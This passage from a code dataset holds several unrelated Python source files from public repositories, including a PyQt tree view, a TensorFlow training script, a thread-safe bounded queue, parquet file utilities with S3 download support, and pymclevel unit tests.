elif self.tree :\n return self.tree.fileLocAt(treePath) # tree is an AttribModel\n else :\n return None\n \n def listForPopup(self) :\n if self.doesListPopup :\n classListStr = self.getData(1)\n # turn into list\n res = classListStr.split(' ') # two spaces\n res.sort()\n return res\n else :\n return None\n \n def showPopupList(self, listToShow, widget) :\n dialog = AttrValueListDialog(widget, self.name, listToShow)\n dialog.show() # modeless\n\n \n def debugPrintData(self) :\n print(self.name)\n if self.isTree : \n print(\">>>\")\n self.tree.debugPrintData()\n print(\"<<<\")\n\n# end of class Attribute\n\n\n# An AttribModel consists of a list of Attributes, corresponding to a row in the AttribView control.\n# An Attribute can be a sub-tree which in turn contains an AttribModel with the list of sub-items.\n\nclass AttribModel(QtCore.QAbstractItemModel) :\n\n def __init__(self, data, parent = None, root = None) : # data is a list of Attributes\n super(AttribModel, self).__init__(parent)\n self.__data = data\n self.__root = root if root else self\n self.__parent = parent\n \n def add(self, data) :\n self.__data.append(data)\n\n def rowCount(self, parent) :\n if not parent or not parent.isValid() :\n return len(self.__data)\n else :\n pitem = self.getItem(parent)\n return pitem.__data[parent.row()].childNumber(parent.row())\n\n def columnCount(self, parent) :\n return 2\n\n def data(self, index, role) :\n if not index.isValid() or (role != QtCore.Qt.DisplayRole and role != QtCore.Qt.EditRole) :\n return None\n\n item = self.getItem(index)\n dat = item.__data[index.row()]\n return dat.getData(index.column())\n\n def flags(self, index) :\n res = QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable\n if index and index.isValid() :\n item = self.getItem(index)\n dat = item.__data[index.row()]\n if dat.isEditable(index.column()) :\n res |= QtCore.Qt.ItemIsEditable\n return res\n\n def child(self, num) :\n return self.__data[num]\n\n def getChildRow(self, model) :\n for i, d in enumerate(self.__data) :\n if len(d.params) and d.params[0] == model :\n return i\n return -1\n \n def parent(self, index) :\n if index and index.isValid() :\n child = self.getItem(index)\n parent = child.__parent\n if parent :\n row = parent.getChildRow(child)\n if row >= 0 :\n return parent.createIndex(row, 0, parent)\n return QtCore.QModelIndex()\n\n def getItem(self, index) :\n if index and index.isValid() :\n item = index.internalPointer()\n if item : return item\n return self\n\n def index(self, row, column, parent = None) :\n if not parent or not parent.isValid() :\n return self.createIndex(row, column, self.__root)\n else :\n parentModel = self.getItem(parent)\n parentItem = parentModel.__data[parent.row()]\n if parentItem.tree :\n return self.createIndex(row, column, parentItem.tree)\n return QtCore.QModelIndex()\n\n def setData(self, index, value, role) :\n if role != QtCore.Qt.EditRole:\n return False\n item = self.getItem(index)\n attrib = item.__data[index.row()]\n res = attrib.setData(index.column(), value)\n if res :\n self.__root.dataChanged.emit(index, index)\n return res\n \n def fileLocAt(self, treePath) :\n i = treePath[0]\n attrData = self.__data[i]\n return attrData.getFileLoc(treePath[1:])\n \n def listForPopup(self, treePath) :\n i = treePath[0]\n attrData = self.__data[i]\n return attrData.listForPopup()\n \n def showPopupList(self, treePath, listToShow, widget) :\n i = treePath[0]\n attrData = self.__data[i]\n return attrData.showPopupList(listToShow, widget) \n\n def debugPrintData(self) :\n print(self.__data)\n for d in self.__data :\n d.debugPrintData()\n\n# end of class AttribModel\n \n\nclass AttribView(QtWidgets.QTreeView) :\n\n def __init__(self, app, parent = None) :\n super(AttribView, self).__init__(parent)\n self.app = app\n self.header().setStretchLastSection(True)\n self.header().setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)\n self.header().hide()\n self.attribDelegate = AttributeDelegate(self)\n #self.setItemDelegateForColumn(1, self.attribDelegate)\n\n @QtCore.Slot(DataObj, ModelSuper)\n def changeData(self, data, modelBogus) : # data is a Slot, GraideGlyph, etc.; modelBogus is eg RunView\n self.data = data\n self.model = data.attribModel() if data else None\n self.setModel(self.model)\n self.expandAll()\n \n def dataObject(self) :\n try :\n return self.data\n except :\n return None\n\n def removeCurrent(self) :\n index = self.currentIndex()\n self.model.setData(index, None, QtCore.Qt.EditRole)\n \n def mouseDoubleClickEvent(self, event) :\n #print(\"mouseDoubleClickEvent\")\n super(AttribView, self).mouseDoubleClickEvent(event)\n \n # Generate a path to where the click was in the tree control.\n row = self.currentIndex().row()\n parentIndex = self.currentIndex().parent()\n treePath = [row]\n while parentIndex.row() > -1 :\n treePath.insert(0, parentIndex.row()) # prepend\n parentIndex = parentIndex.parent()\n \n pList = self.model.listForPopup(treePath)\n if pList :\n self.model.showPopupList(treePath, pList, self)\n else :\n fileLoc = self.model.fileLocAt(treePath)\n if fileLoc : \n self.app.selectLine(*fileLoc)\n\n def findMainFileLoc(self) :\n treePath = [0] # for Glyph tab, assumes glyph number is the first\n fileLoc = self.model.fileLocAt(treePath)\n if fileLoc :\n self.app.selectLine(*fileLoc)\n \n# end of class AttribView\n\n\nif __name__ == '__main__' :\n\n from graide.font import GraideFont\n import sys, os\n \n app = QtWidgets.QApplication(sys.argv)\n font = GraideFont()\n tpath = os.path.join(os.path.dirname(sys.argv[0]), '../../tests/fonts/Padauk')\n font.loadFont(os.path.join(tpath, 'Padauk.ttf'), os.path.join(tpath, 'padauk.xml'))\n glyph = font.psnames['u1000']\n model = glyph.attribModel()\n view = AttribView(model)\n view.show()\n sys.exit(app.exec_())\n\n","repo_name":"silnrsi/graide","sub_path":"lib/graide/attribview.py","file_name":"attribview.py","file_ext":"py","file_size_in_byte":13158,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"96"} +{"seq_id":"30122426228","text":"def no_ones(number: int) -> int:\n \"\"\"\n nr: 101010\n nr - 1: 101001\n\n nr & (nr - 1) == 101000\n \"\"\"\n\n ones = 0\n\n while number:\n ones += 1\n number = number & (number - 1)\n\n return ones\n\n\ndef solve_ok(number: int) -> int:\n \"\"\" O(k) complexity, where k == no ones \"\"\"\n return no_ones(number) % 2\n\n\ndef solve_efficient(number: int) -> int:\n number ^= number >> 32\n number ^= number >> 16\n number ^= number >> 8\n number ^= number >> 4\n number ^= number >> 2\n number ^= number >> 1\n return number & 1\n\n\nfor solve in [solve_ok, solve_efficient]:\n print(f\"Using {solve.__name__}\")\n\n for (use_case, expected_result) in [\n (int('101010101', 2), 1),\n (int('101010100', 2), 0),\n (int('0', 2), 0),\n (int('1', 2), 1),\n ]:\n result = solve(use_case)\n assert result == expected_result, \\\n f\"Invalid parity {result} for {use_case}, expected {expected_result}\"\n","repo_name":"vtemian/interviews-prep","sub_path":"elements-of-programming-interviews/5.1-parity.py","file_name":"5.1-parity.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"74991847676","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\nimport seaborn as sns\nimport numpy as np\n\nimport model as m\nimport cleanup_preprocessing as p\n\n# --------------------------------- Build model ---------------------------------\nmodel = m.cnn_model(input_shape=(68, 68, 3))\nmodel.summary()\n\n# --------------------------------- Train model ---------------------------------\nprint(\"\\nTraining model...\")\nmodel.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=1e-3), # OG: 1e-4\n loss='categorical_crossentropy',\n metrics=['accuracy', tf.keras.metrics.Precision(), tf.keras.metrics.Recall(), tf.keras.metrics.AUC()])\n\nval_preds = model.predict(p.train_images)\n\nhistory = model.fit(p.x_train_augmented,\n validation_data=[p.val_images, p.val_labels],\n epochs=20,\n verbose=1,\n class_weight=p.class_weights_dict\n )\nprint(\"Training done!\\n\")\n\n# --------------------------------- Evaluate model ---------------------------------\nprint(\"Performing test..\")\nresults = model.evaluate(x=p.val_images, y=p.val_labels)\n\nfor i, metric in enumerate(model.metrics_names):\n print('Final validation {}: {}'.format(metric, results[i]))\n\n# --------------------------------- Plot confusion matrix ---------------------------------\nval_pred = np.argmax(val_preds, axis=1)\nval_true = np.argmax(p.train_labels, axis=1)\n\ncm = confusion_matrix(val_true, val_pred)\ncm = cm / cm.astype(float).sum(axis=1)[:, np.newaxis]\n\nfigure = plt.figure(figsize=(8, 8))\nsns.heatmap(cm,\n annot=True,\n cmap=plt.cm.Blues,\n xticklabels=p.label_dict.keys(),\n yticklabels=p.label_dict.keys())\nplt.tight_layout()\nplt.ylabel('True label')\nplt.xlabel('Predicted label')\nplt.show()\n","repo_name":"Berkanktk/SE05-DL","sub_path":"Assignment02/src/train-and-test.py","file_name":"train-and-test.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"22269458060","text":"from threading import Condition\n\nclass BoundedBlockingQueue(object):\n\n def __init__(self, capacity: int):\n self.queue = [None for i in range(capacity)]\n self.capacity = capacity\n self.head = 0\n self.tail = 0\n self.qsize = 0\n self.condition = Condition()\n\n def enqueue(self, element: int) -> None:\n # with self.lock is equivalent to acquiring a lock at start of with block \n # and releasing it at the end of with block\n with self.condition:\n while self.qsize >= self.capacity:\n self.condition.wait()\n\n if self.tail == self.capacity:\n self.tail = 0\n self.queue[self.tail] = element\n self.tail += 1\n self.qsize += 1\n self.condition.notify_all()\n\n\n def dequeue(self) -> int:\n with self.condition:\n while self.qsize == 0:\n self.condition.wait()\n\n if self.head == self.capacity:\n self.head = 0\n ans = self.queue[self.head]\n self.head += 1\n self.qsize -= 1\n self.condition.notify_all()\n return ans\n\n def size(self):\n return self.qsize\n\n","repo_name":"chetan8888/dsa-templates","sub_path":"bounded_queue_multithreading.py","file_name":"bounded_queue_multithreading.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"177545239","text":"import os, sys # A system-specific prefix, for working between linux and windows\nprefix = 'C:/' if os.name == 'nt' else '/home/leandro/'\nsys.path.append(os.path.join(prefix, 'gitRepos/bimvee')) # A path to this library\nname = 'parking1'\n\n#%%\nfrom bimvee.importRpgDvsRos import importRpgDvsRos\nfrom bimvee.split import cropTime\nfilePathOrName = os.path.join(prefix, 'data/ETH_HDR/'+name+'/'+name+'.bag')\n#inspected = importRpgDvsRos(filePathOrName=filePathOrName)\n\ntemplate = {\n 'ch0': {\n 'dvs': '/dvs/cam1/events'\n }\n }\n\n#imported = importRpgDvsRos(filePathOrName=filePathOrName, template=template)\n\n \n#%%\n\nimported = cropTime(importRpgDvsRos(filePathOrName=filePathOrName, \n template=template),\n startTime = 16,\n stopTime = 24)\n\n\n#imported['data'] = imported['data'].pop('ch0')\n#%% Choose to export only specific datatypes; \n# overwrite data if the export is already there\n\nfrom bimvee.exportIitYarp import exportIitYarp\n\nexportIitYarp(imported,\n exportFilePath = prefix+'data/ETH_HDR/'+name+'/'+name,\n pathForPlayback = prefix+'data/ETH_HDR/'+name+'/'+name,\n dataTypes = ['dvs'],\n protectedWrite = False)\n","repo_name":"event-driven-robotics/high-throughput-convolutions","sub_path":"src/python/ros2yarp.py","file_name":"ros2yarp.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"13794742233","text":"from mcpi.minecraft import Minecraft\n\nmc = Minecraft.create()\n\n# level = world\n# # # # # # # #\n# home\nSonarNeedle = mc.getPlayerEntityId(\"SonarNeedle\")\nmc.entity.setPos(SonarNeedle,-200.32,33.0,-370.72)\n\n# lava home\nSirleech = mc.getPlayerEntityId(\"sirleech\")\nmc.entity.setPos(Sirleech,-157.824659,35.0,-372.25975)\n","repo_name":"sirleech/minecraft-python-scripts","sub_path":"TakeMeHome.py","file_name":"TakeMeHome.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10617031789","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt #we will use it to draw the learning curve after training the network\n\ntrain_x = [[0.0, 0.0], [0.0, 1.0], [1.0, 0.0], [1.0, 1.0]]\ntrain_y = [[0], [1], [1], [0]]\n\nINPUT_NEURONS = 2\nHIDDEN_NEURONS = 3\nOUTPUT_NEURONS = 1\n\nNUM_OF_EPOCHS = 100000\n\n\"\"\"(tf.float32, [None, 2]) specifies the datatype and the dimensions of the data.\n#Since we don't know the number of the training data, we make it None which means it accepts any from the user.\n#2 specifies that we have 2 input bits\n\"\"\"\nx = tf.placeholder(tf.float32, [None, 2])\ny_target = tf.placeholder(tf.float32, [None, 1])\n\n\"\"\"\n1- Create the Input-to-hidden weights and bias matrices from the given figure.\nThey should be Variable datatype because they will be changed during the learning process\n\"\"\"\ninput_hidden_weights = tf.Variable([[-0.99, 1.05, .19], [-0.43, -0.44, -0.30]]) #Init. from the given network\ninput_hidden_bias = tf.Variable(tf.ones([HIDDEN_NEURONS])) # The bias is one for each hidden neuron\n\n\"\"\"\n2- Get the values of the hidden layer by multiplying the features with the weight matrix [Input to Hidden feedforward]\nApply the hidden layer activation to the multiplication result\n\"\"\"\nhidden_neurons_values = tf.matmul(x, input_hidden_weights) + input_hidden_bias\nhidden_activation_result = tf.nn.sigmoid(hidden_neurons_values)\n\n\"\"\"\n3- Create the hidden-to-output weights and bias matrices from the given figure.\nThey should be Variable datatype because they will be changed during the learning process\n\"\"\"\n\nhidden_output_weights = tf.Variable([[0.18], [1.11], [-0.26]])\nhidden_output_bias = tf.Variable(tf.ones([1]))\n\n\"\"\"\n4- Get the values of the output layer by multiplying the hidden layer with the weight matrix [Hidden to Output feedforward]\nApply the output layer activation to the multiplication result\n\"\"\"\n\nhidden_output_value = tf.matmul(hidden_activation_result, hidden_output_weights) + hidden_output_bias\ny_estimated = tf.nn.sigmoid(hidden_output_value)\n\n\n\"\"\"\n5- Calculate the mean squared error given your prediction and the actual output\n\"\"\"\n\nmean_squared_error = 0.5 * tf.reduce_sum((tf.square(y_estimated - y_target)))\n\ntrain = tf.train.GradientDescentOptimizer(0.1).minimize(mean_squared_error)\n\n\n\"\"\"\nInitiate a Tensorflow graph and session variables\n\"\"\"\nsession = tf.Session()\nsession.run(tf.initialize_all_variables())\n\nerrors = []\nepochs = []\n\nfor i in range(0, NUM_OF_EPOCHS):\n session.run(train, feed_dict={x: train_x, y_target: train_y})\n\n if i % 10 == 0:\n print(\"Iteration number: \", i, \"\\n\")\n error = session.run(mean_squared_error, feed_dict={x: train_x, y_target: train_y})\n print(\"Cost: \", error, \"\\n\")\n errors.append(error)\n epochs.append(i)\n\n if error < 0.01:\n print(\"Input to hidden Weights\",\n session.run(input_hidden_weights, feed_dict={x: train_x, y_target: train_y}))\n print(\"Input to hidden bias\",\n session.run(input_hidden_bias, feed_dict={x: train_x, y_target: train_y}))\n print(\"Hidden to output weight\",\n session.run(hidden_output_weights, feed_dict={x: train_x, y_target: train_y}))\n print(\"Hidden to output bias\",\n session.run(hidden_output_bias, feed_dict={x: train_x, y_target: train_y}))\n\n plt.title(\"Learning Curve using mean squared error cost function\")\n print(\"Cost: \", error, \"\\n\")\n plt.xlabel(\"Number of Epochs\")\n plt.ylabel(\"Cost\")\n plt.plot(epochs, errors)\n plt.show()\n\n break","repo_name":"AhmedHani/FCIS-Machine-Learning-2017","sub_path":"Session4/Practical/Solution/XOR/xor_nn.py","file_name":"xor_nn.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"96"} +{"seq_id":"4400121725","text":"import glob\nfrom abc import ABC, abstractmethod\nfrom contextlib import ExitStack, contextmanager\nfrom dataclasses import dataclass\nfrom functools import reduce\nfrom logging import getLogger\nfrom pathlib import Path\nfrom sys import stderr\nfrom tempfile import TemporaryDirectory\nfrom typing import Iterator, List, Optional, Union\nfrom urllib.parse import urlparse\nfrom uuid import uuid4\n\nimport boto3\nimport pandas as pd\nimport pyarrow.parquet as pq\nfrom pyarrow import lib as pyarrowlib\nfrom halo import Halo\n\nlogger = getLogger(__name__)\n\n\nclass InvalidCommandExcpetion(Exception):\n '''Exception for invalid command. Argment parser raises this Exception.\n '''\n pass\n\n\nclass FileNotFoundException(Exception):\n pass\n\n\nclass ParquetFile(ABC):\n '''Abstract ParquetFile.\n One object does not correspond one parquet file but one expression about file\n such as ./target.parquet, ./*.parquet, s3://bucket/foo.parquet or s3://bucket/*\n '''\n\n def __post_init__(self):\n self.validation()\n\n def validation(self) -> None:\n '''validate properties\n '''\n pass\n\n @abstractmethod\n def is_wildcard(self) -> bool:\n '''Return if this object correspond one or more object.\n '''\n raise NotImplementedError()\n\n @abstractmethod\n def resolve_wildcard(self) -> List['ParquetFile']:\n '''Return concrete Parquert file objects.\n '''\n raise NotImplementedError()\n\n @contextmanager\n @abstractmethod\n def get_local_path(self) -> Iterator[str]:\n '''Return local file path.\n If call this function of S3ParquetFile, return the path of downloaded file.\n '''\n raise NotImplementedError()\n\n @contextmanager\n def get_dataframe(self) -> pd.DataFrame:\n with self.get_local_path() as local_path:\n try:\n yield pq.read_table(local_path).to_pandas()\n except pyarrowlib.ArrowInvalid:\n print(f\"File({local_path}) cannot be read as parquet.\", file=stderr)\n yield None\n\n\n@dataclass\nclass LocalParquetFile(ParquetFile):\n '''Parquet file object on local disk\n '''\n path: str\n\n def is_wildcard(self) -> bool:\n return '*' in self.path\n\n def resolve_wildcard(self) -> List[ParquetFile]:\n return sorted(\n [LocalParquetFile(f) for f in glob.glob(self.path)],\n key=lambda x: x.path\n )\n\n @contextmanager\n def get_local_path(self) -> Iterator[str]:\n if self.is_wildcard():\n raise Exception('Please resolve first.')\n if not Path(self.path).exists():\n raise FileNotFoundException(f'File({self.path}) not found')\n yield self.path\n\n\n@dataclass\nclass S3ParquetFile(ParquetFile):\n '''Parquet file object on S3\n '''\n aws_session: boto3.Session\n bucket: str\n key: str\n endpoint_url: Optional[str] = None\n\n def validation(self):\n ''' key can have *. But it must be last of the string.\n '''\n if self.is_wildcard() and not self.key.index('*') in (-1, len(self.key) - 1):\n raise InvalidCommandExcpetion('You can use * only end of the path')\n\n def is_wildcard(self) -> bool:\n return '*' in self.key\n\n def resolve_wildcard(self) -> List[ParquetFile]:\n list_res = self.aws_session.client('s3', endpoint_url=self.endpoint_url)\\\n .list_objects_v2(\n Bucket=self.bucket,\n Prefix=self.key[:-1] # remove *\n )\n if list_res['IsTruncated']:\n raise Exception(f'Too much file match s3://{self.bucket}/{self.key}')\n\n if list_res['KeyCount'] == 0:\n return []\n keys = [e['Key'] for e in list_res['Contents']]\n return sorted(\n [S3ParquetFile(aws_session=self.aws_session, bucket=self.bucket, key=key, endpoint_url=self.endpoint_url) for key in keys],\n key=lambda x: x.key\n )\n\n @contextmanager\n def get_local_path(self) -> Iterator[str]:\n if self.is_wildcard():\n raise Exception('Please resolve first.')\n with TemporaryDirectory() as tmp_path:\n localfile = f'{tmp_path}/{uuid4()}.parquet'\n logger.info(f'Download stat parquet file on s3://{self.bucket}/{self.key} -> {localfile}')\n try:\n with Halo(text='Downloading from s3', spinner='dots', stream=stderr) as spinner:\n self.aws_session.resource('s3', endpoint_url=self.endpoint_url)\\\n .meta.client.download_file(self.bucket, self.key, localfile)\n spinner.info(f's3://{self.bucket}/{self.key} => {localfile}')\n except Exception:\n raise FileNotFoundException(f's3://{self.bucket}/{self.key} not found or cannot access')\n else:\n yield localfile\n\n\ndef get_aws_session(profile_name: Optional[str]) -> boto3.Session:\n return boto3.Session(profile_name=profile_name)\n\n\ndef _is_s3_file(filename: str) -> bool:\n return filename[:5] == 's3://'\n\n\ndef to_parquet_file(file_exp: str, awsprofile: Optional[str], endpoint_url: Optional[str]) -> ParquetFile:\n '''Transform file_exp to ParquetFile object.\n '''\n if _is_s3_file(file_exp):\n parsed_url = urlparse(file_exp)\n return S3ParquetFile(\n aws_session=get_aws_session(awsprofile),\n bucket=parsed_url.netloc,\n key=parsed_url.path[1:],\n endpoint_url=endpoint_url\n )\n else:\n return LocalParquetFile(\n path=file_exp\n )\n\n\n@contextmanager\ndef get_datafame_from_objs(objs: List[ParquetFile], head: Union[int, float] = None):\n '''Get pandas dataframe of ParquetFile object list.\n '''\n\n if head is None or head <= 0:\n head = float('inf')\n\n cumsum_row: int = 0\n dfs: List[pd.DataFrame] = []\n with ExitStack() as stack:\n for obj in objs:\n for pf in _resolve_wildcard(obj):\n df: Optional[pd.DataFrame] = stack.enter_context(pf.get_dataframe())\n if df is None:\n continue\n cumsum_row += len(df)\n dfs.append(df)\n\n if cumsum_row >= head:\n break\n if cumsum_row >= head:\n break\n if dfs:\n yield reduce(lambda x, y: pd.concat([x, y]), dfs)\n else:\n yield None\n\n\ndef _resolve_wildcard(obj: ParquetFile) -> List[ParquetFile]:\n if not obj.is_wildcard():\n return [obj]\n else:\n return obj.resolve_wildcard()\n","repo_name":"ktrueda/parquet-tools","sub_path":"parquet_tools/commands/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"96"} +{"seq_id":"74475119354","text":"from ..lang import *\n\n\ndef test_defs_folder():\n assert DEFS_FOLDER.endswith('/.langtool')\n\n\nSAMPLE_LANG = '''\n{\n \"vowels\": \"aeiou\",\n \"consonants\": \"stpnmfhzdb\",\n \"sylpats\": [\"CV\", \"CCV\", \"CVC\", \"VC\", \"V\"]\n}\n'''\n\ndef test_syllables():\n l = Lang('foo', SAMPLE_LANG)\n for s in l.syllables:\n print(s)","repo_name":"dhh1128/langtool","sub_path":"langtool/tests/lang_test.py","file_name":"lang_test.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"24840969040","text":"#\n# @lc app=leetcode id=164 lang=python3\n#\n# [164] Maximum Gap\n#\n\n\nclass Solution:\n\n def maximumGap(self, nums: List[int]) -> int:\n if len(nums) < 2:\n return 0\n nums = sorted(nums)\n maximum = 0\n for i in range(len(nums)):\n maximum = max(maximum, nums[i]-nums[i-1])\n # print(start, end)\n return maximum\n","repo_name":"gusibi/leetcode","sub_path":"codes/164.maximum-gap.py","file_name":"164.maximum-gap.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"24976063434","text":"'''\nCreated on Jul 23, 2011\n\n@author: Rio\n'''\n#from mclevel import fromFile, loadWorldNumber, BoundingBox\n#from infiniteworld import MCInfdevOldLevel\n#from schematic import MCSchematic\nfrom pymclevel import *\n\nimport itertools\nimport traceback\nimport unittest\nimport tempfile\nimport logging\nimport shutil\nimport os\nimport numpy\nfrom numpy import *\nfrom logging import info\n#logging.basicConfig(format=u'%(levelname)s:%(message)s')\n#logging.getLogger().level = logging.INFO\n\nclass TempLevel(object):\n def __init__(self, filename):\n if not os.path.exists(filename):\n filename = os.path.join(\"testfiles\", filename)\n#def tempCopy(filename):\n if os.path.isdir(filename):\n tmpname = tempfile.mkdtemp(os.path.basename(filename))\n os.rmdir(tmpname)\n shutil.copytree(filename, tmpname)\n else:\n fd, tmpname = tempfile.mkstemp(os.path.basename(filename))\n os.close(fd)\n os.unlink(tmpname)\n shutil.copy(filename, tmpname)\n\n self.tmpname = tmpname\n self.level = fromFile(tmpname)\n\n#def tempRemove(filename):\n def __del__(self):\n self.level.close()\n del self.level\n filename = self.tmpname\n\n if os.path.isdir(filename):\n shutil.rmtree(filename)\n else:\n os.unlink(filename)\n\nclass TestIndevLevel(unittest.TestCase):\n def setUp(self):\n self.srclevel = TempLevel(\"hell.mclevel\")\n self.indevlevel = TempLevel(\"hueg.mclevel\")\n\n def testEntities(self):\n level = self.indevlevel.level\n entityTag = Entity.Create(\"Zombie\")\n tileEntityTag = TileEntity.Create(\"Painting\")\n level.addEntity(entityTag)\n level.addTileEntity(tileEntityTag)\n schem = level.extractSchematic(level.bounds)\n level.copyBlocksFrom(schem, schem.bounds, (0, 0, 0))\n\n #raise Failure \n\n def testCopy(self):\n info(\"Indev level\")\n indevlevel = self.indevlevel.level\n srclevel = self.srclevel.level\n indevlevel.copyBlocksFrom(srclevel, BoundingBox((0, 0, 0), (64, 64, 64,)), (0, 0, 0))\n assert((indevlevel.Blocks[0:64, 0:64, 0:64] == srclevel.Blocks[0:64, 0:64, 0:64]).all())\n\n def testFill(self):\n indevlevel = self.indevlevel.level\n indevlevel.fillBlocks(BoundingBox((0, 0, 0), (64, 64, 64,)), indevlevel.materials.Sand, [indevlevel.materials.Rock, indevlevel.materials.Dirt])\n indevlevel.saveInPlace()\n\n\nclass TestJavaLevel(unittest.TestCase):\n def setUp(self):\n self.creativelevel = TempLevel(\"Dojo_64_64_128.dat\")\n self.indevlevel = TempLevel(\"hell.mclevel\")\n\n def testCopy(self):\n indevlevel = self.indevlevel.level\n creativelevel = self.creativelevel.level\n\n creativelevel.copyBlocksFrom(indevlevel, BoundingBox((0, 0, 0), (64, 64, 64,)), (0, 0, 0))\n assert(numpy.array((indevlevel.Blocks[0:64, 0:64, 0:64]) == (creativelevel.Blocks[0:64, 0:64, 0:64])).all())\n\n creativelevel.saveInPlace()\n #xxx old survival levels\n\n\nclass TestAlphaLevelCreate(unittest.TestCase):\n def testCreate(self):\n temppath = tempfile.mktemp(\"AlphaCreate\")\n self.alphaLevel = MCInfdevOldLevel(filename=temppath, create=True);\n\nclass TestAlphaLevel(unittest.TestCase):\n def setUp(self):\n #self.alphaLevel = TempLevel(\"Dojo_64_64_128.dat\")\n self.indevlevel = TempLevel(\"hell.mclevel\")\n self.alphalevel = TempLevel(\"PyTestWorld\")\n\n\n def testCreateChunks(self):\n indevlevel = self.indevlevel.level\n level = self.alphalevel.level\n\n for ch in list(level.allChunks): level.deleteChunk(*ch)\n level.createChunksInBox(BoundingBox((0, 0, 0), (32, 0, 32)))\n\n def testCopyConvertBlocks(self):\n indevlevel = self.indevlevel.level\n level = self.alphalevel.level\n level.copyBlocksFrom(indevlevel, BoundingBox((0, 0, 0), (256, 128, 256)), (-0, 0, 0))\n\n convertedSourceBlocks, convertedSourceData = indevlevel.convertBlocksFromLevel(level, indevlevel.Blocks[0:16, 0:16, 0:indevlevel.Height], indevlevel.Data[0:16, 0:16, 0:indevlevel.Height])\n assert (level.getChunk(0, 0).Blocks[0:16, 0:16, 0:indevlevel.Height] == convertedSourceBlocks).all()\n\n def testImportSchematic(self):\n indevlevel = self.indevlevel.level\n level = self.alphalevel.level\n\n schem = fromFile(\"schematics\\\\CreativeInABox.schematic\");\n level.copyBlocksFrom(schem, BoundingBox((0, 0, 0), (1, 1, 3)), (0, 64, 0));\n schem = MCSchematic(shape=(1, 1, 3))\n schem.copyBlocksFrom(level, BoundingBox((0, 64, 0), (1, 1, 3)), (0, 0, 0));\n convertedSourceBlocks, convertedSourceData = schem.convertBlocksFromLevel(level, schem.Blocks, schem.Data)\n assert (level.getChunk(0, 0).Blocks[0:1, 0:3, 64:65] == convertedSourceBlocks).all()\n\n def testRecreateChunks(self):\n level = self.alphalevel.level\n\n for x, z in itertools.product(xrange(-1, 3), xrange(-1, 2)):\n level.deleteChunk(x, z);\n level.createChunk(x, z)\n\n def testFill(self):\n level = self.alphalevel.level\n\n level.fillBlocks(BoundingBox((-11, 0, -7), (38, 128, 25)) , level.materials.WoodPlanks);\n c = level.getChunk(0, 0)\n assert (c.Blocks == 5).all()\n\n def testReplace(self):\n level = self.alphalevel.level\n\n level.fillBlocks(BoundingBox((-11, 0, -7), (38, 128, 25)) , level.materials.WoodPlanks, [level.materials.Dirt, level.materials.Grass]);\n\n def testSaveRelight(self):\n indevlevel = self.indevlevel.level\n level = self.alphalevel.level\n\n cx, cz = -3, -1;\n\n level.deleteChunk(cx, cz);\n\n level.createChunk(cx, cz);\n level.copyBlocksFrom(indevlevel, BoundingBox((0, 0, 0), (64, 64, 64,)), (-96, 32, 0))\n\n level.generateLights();\n level.saveInPlace();\n\n\nclass TestSchematics(unittest.TestCase):\n def setUp(self):\n #self.alphaLevel = TempLevel(\"Dojo_64_64_128.dat\")\n self.indevlevel = TempLevel(\"hell.mclevel\")\n\n def testCreate(self):\n #info(\"Schematic from indev\")\n\n size = (64, 64, 64)\n schematic = MCSchematic(shape=size, filename=\"hell.schematic\", mats='Classic');\n level = self.indevlevel.level\n schematic.rotateLeft();\n\n self.failUnlessRaises(ValueError, lambda:(\n schematic.copyBlocksFrom(level, BoundingBox((-32, -32, -32), (64, 64, 64,)), (0, 0, 0))\n ))\n\n schematic.copyBlocksFrom(level, BoundingBox((0, 0, 0), (64, 64, 64,)), (0, 0, 0))\n assert((schematic.Blocks[0:64, 0:64, 0:64] == level.Blocks[0:64, 0:64, 0:64]).all())\n schematic.compress();\n\n schematic.copyBlocksFrom(level, BoundingBox((0, 0, 0), (64, 64, 64,)), (-32, -32, -32))\n assert((schematic.Blocks[0:32, 0:32, 0:32] == level.Blocks[32:64, 32:64, 32:64]).all())\n\n schematic.compress();\n\n schematic.saveInPlace();\n\n schem = fromFile(\"schematics\\CreativeInABox.schematic\");\n tempSchematic = MCSchematic(shape=(1, 1, 3))\n tempSchematic.copyBlocksFrom(schem, BoundingBox((0, 0, 0), (1, 1, 3)), (0, 0, 0))\n\n info(\"Schematic from alpha\")\n level = loadWorldNumber(1)\n for cx, cz in itertools.product(xrange(0, 4), xrange(0, 4)):\n try:\n level.createChunk(cx, cz)\n except ValueError:\n pass\n schematic.copyBlocksFrom(level, BoundingBox((0, 0, 0), (64, 64, 64,)), (0, 0, 0))\n\n def testINVEditChests(self):\n info(\"INVEdit chest\")\n invFile = fromFile(\"schematics/Chests/TinkerersBox.inv\");\n info(\"Blocks: \", invFile.Blocks)\n info(\"Data: \", invFile.Data)\n info(\"Entities: \", invFile.Entities)\n info(\"TileEntities: \", invFile.TileEntities)\n #raise SystemExit;\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n 